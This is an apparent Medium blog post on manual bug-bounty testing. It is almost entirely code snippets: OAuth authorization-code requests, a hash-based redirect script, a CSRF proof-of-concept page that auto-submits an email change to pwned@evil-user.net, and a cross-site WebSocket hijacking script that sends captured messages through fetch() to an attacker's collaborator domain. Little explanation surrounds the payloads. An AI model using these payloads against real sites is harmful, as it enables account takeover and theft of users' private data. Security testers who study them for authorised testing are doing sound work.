Bug Bounty — Manual Approach To Test Vulnerabilities (PART 1 )

Manual testing using Burp Suite
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: oauth-authorization-server.com 
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1 Host: client-app.com 
 -> POST /token HTTP/1.1 -> Host: oauth-authorization-server.com   … client_id=12345&client_secret=SECRET&   redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8 
<script> 
if (document.location.hash)
{
console.log(“Hash identified — redirecting…”);
window.location = ‘/?’+document.location.hash.substr(1);
}
else
{
console.log(“No hash identified in URL”);
}
</script>
<html> 
<body>
<form action=”https://vulnerable-website.com/email/change” method=”POST”>
<input type=”hidden” name=”email” value=”pwned@evil-user.net” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
 <script> 
websocket = new WebSocket(‘wss://your-websocket-URL’)
websocket.onopen = start websocket.onmessage = handleReply
function start(event)
{
websocket.send(“READY”);
}
function handleReply(event)
{
fetch(‘https://your-collaborator-domain/?’+event.data, {mode: ‘no-cors’})
}
</script>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
apex

apex

I try to analyze ransomware attacks | Static Code Analysis | Privacy & Security Updates | Pen Testing | Bug Bounty